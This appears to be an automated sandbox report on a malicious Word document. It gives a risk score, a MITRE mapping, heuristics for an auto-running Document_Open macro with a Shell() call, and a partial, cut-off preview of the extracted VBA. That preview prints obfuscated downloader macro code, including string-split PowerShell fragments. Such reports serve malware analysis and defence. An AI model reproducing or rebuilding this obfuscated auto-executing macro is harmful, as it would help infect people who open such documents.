MALICIOUS
162
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
The sample is a malicious Office document containing VBA macros. The 'Document_open' macro is present and triggers a 'Shell()' call, indicating an attempt to execute arbitrary commands. This is a common technique for downloading and executing further malicious payloads. The presence of the Shell() call and the auto-execution of the Document_open macro strongly suggest a downloader or droppper functionality.
Heuristics 5
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
Document_Open macro high OLE_VBA_DOCOPENDocument_Open macro
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 32288 bytes |
SHA-256: cf3b58fa93b3c2407d9be344b6c5cee1098dffbb50e79df0a0c7943b78e45910 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "VUlacfjdLT"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub uKYqZw(zFEAs)
VzwqI = 57820 * rNZQJ + 67136 * ChrB(67307 * Rnd(79813) - 24492 + jzWWrQ) - 7407 - Rnd(HjwVXj) + 71996 - Tqifv * 62626 * Chr(jGhlIh)
End Sub
Sub NYlNYC(zijuC)
zSWpt = 59439 * PsLjwz + 11498 * ChrB(74927 * Rnd(31399) - 18609 + vGQTYk) - 19269 - Rnd(izVMv) + 71619 - fuQkrr * 56346 * Chr(bVNEQY)
jhUEwv = 70495 * ulflwo + 88646 * ChrB(62691 * Rnd(30300) - 91610 + ULWjR) - 74910 - Rnd(NpwKj) + 87721 - mPorrm * 94264 * Chr(RVwLGh)
jozIM = 8917 * MACRji + 91282 * ChrB(60352 * Rnd(69420) - 11415 + CKYFpY) - 18017 - Rnd(ZuAiG) + 62700 - HIJMXh * 58363 * Chr(DnoZF)
End Sub
Sub zllsZ(XjbzZ)
FfrMSw = 70458 * anVXiE + 46773 * ChrB(18500 * Rnd(41229) - 35180 + wDsZI) - 29003 - Rnd(jcObjK) + 75725 - cwJrU * 84540 * Chr(KnMQOJ)
fNLIw = 50957 * MFjwcQ + 14845 * ChrB(63930 * Rnd(99117) - 12222 + kKcZA) - 58510 - Rnd(IJtENs) + 1648 - LzAPXM * 24774 * Chr(Psausb)
End Sub
Private Sub Document_open()
On Error Resume Next
coFFiz = 85372 * MjLpQ + 3815 * ChrB(15118 * Rnd(85800) - 82494 + vFKjji) - 97241 - Rnd(hMjak) + 9733 - cQQHmW * 63595 * Chr(rniMW)
AoNafpuw (aHAjzw + PcUWwkmvVE + XwEXG)
SfZmw = 12392 * olrlE + 48917 * ChrB(28337 * Rnd(73387) - 35460 + BVcbGE) - 62480 - Rnd(mIKEUL) + 69262 - POnSBm * 11549 * Chr(HpQPi)
End Sub
Sub hkEDD(ifLas)
KwwkRf = 2160 * Jzwzq + 28394 * ChrB(30703 * Rnd(29223) - 38973 + oRMOa) - 50700 - Rnd(QIiBkD) + 24326 - GcHOW * 46009 * Chr(NGOhlF)
olPLu = 73232 * ivXXkB + 45728 * ChrB(35780 * Rnd(45331) - 49299 + mZkmHA) - 95221 - Rnd(EDGzso) + 89780 - TwlYI * 51093 * Chr(YjkrmW)
viplz = 59887 * CdPNBh + 45731 * ChrB(53508 * Rnd(93518) - 59431 + pwEVlB) - 77778 - Rnd(bLGXJ) + 21679 - rIXKH * 80046 * Chr(aRTWK)
End Sub
Sub sawjF(wYIZw)
wnDRwG = 11376 * iqPDm + 45270 * ChrB(87278 * Rnd(50527) - 46899 + CPqhSA) - 28730 - Rnd(RBOwj) + 66114 - WKBLIU * 25497 * Chr(IbCLs)
End Sub
Sub iOWzUX(zPUDCZ)
EnjGhc = 31512 * rOPSo + 97219 * ChrB(65790 * Rnd(11036) - 31475 + WZjmsw) - 28122 - Rnd(tYvhI) + 12372 - YLUvvd * 30327 * Chr(VXHkCi)
PJEOjA = 9063 * vhsWj + 84916 * ChrB(33474 * Rnd(19771) - 12681 + WQmNK) - 39606 - Rnd(GsOPl) + 28620 - cKImc * 87544 * Chr(vUtZOD)
End Sub
Attribute VB_Name = "joDMAafS"
Sub BzjDZH(CJSfuY)
fhNibv = 86262 * vQDaDK + 4599 * ChrB(69699 * Rnd(76927) - 62798 + OGmsq) - 1340 - Rnd(dqPvXN) + 14681 - YfnsD * 43403 * Chr(MDSzz)
End Sub
Function PcUWwkmvVE()
On Error Resume Next
NzSZzi = 40739 * zTCtR + 389 * ChrB(99217 * Rnd(64900) - 36098 + VuoQNE) - 30306 - Rnd(AIRvUN) + 50156 - nwouzG * 50386 * Chr(PQwLqV)
qRYsDFmrM = PZKzoR("XVs3ri+'+'G'+'xuSDGxu+GxuC = OYGxu+'+'GxuUGxu+Gxuenv:pGxu+GxuubliGxu+Gxuc Gxu+Gxu+ Gxu+GHD", NSRsr - NSRsr + 7 + NSRsr - NSRsr, NSRsr - NSRsr + 82 + NSRsr - NSRsr)
AtYBj = 81064 * kNJUdM + 69975 * ChrB(8025 * Rnd(98369) - 79082 + aMAtY) - 95806 - Rnd(ULAwI) + 8304 - iIQBvL * 87876 * Chr(qOald)
WiCrB = 52485 * wGXKv + 91934 * ChrB(64217 * Rnd(31129) - 42582 + iiwWzN) - 54114 - Rnd(MoQPnk) + 99379 - Olfba * 81198 * Chr(Bobjn)
CnjSWWr = PZKzoR("MSlExu5MLNvC5Gxu+GxuML +Gxu+Gxu OYUNSGxu+GxuB + (5ML.ex5ML+5Gxu+GxuML'+'Gxu+Gxue5Gxu+GxuMLGxu+Gxu);forGxu+GxueGxu+GxuaGxu+G'+'xucGxu+Gxuh(Gxu+iM", OrLRHs - OrLRHs + 5 + OrLRHs - OrLRHs, OrLRHs - OrLRHs + 138 + OrLRHs - OrLRHs)
OYtiz = 64584 * zmZVaP + 78584 * ChrB(74774 * Rnd(90382) - 67262 + mKihv) - 70337 - Rnd(SnVvhV) + 57202 - SwPXjn * 6245 * Chr(TbMKB)
YZbti = 48261 * isbuG + 46041 * ChrB(70883 * Rnd(36126) - 76201 + orfzi) - 4104 - Rnd(EsTIm) + 11541 - QZtDnv * 50568 * Chr(VbPjfi)
OHwtzZjdjk = PZKzoR("jjbtsjGxu+GxuvOadFGxu+GxuIsGxu+GxujvGxu+GxuleZGx'+'u+Gxuts(OYGxu+GxuUasGxu+GxufGxu+Gxuc.Gxu+GxuZtGxu+GxusTGxu+GxuoStGxu+Gxursjv'+'is'+I2wi", BZGFI - BZGFI + 5 + BZGFI - BZGFI, BZGFI - BZGFI + 130 + BZGFI - BZGFI)
FFsoo = 70609 * dMqXao + 81098 * ChrB(11338 * Rnd(98087) - 85168 + qdjiji) - 85097 - R
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.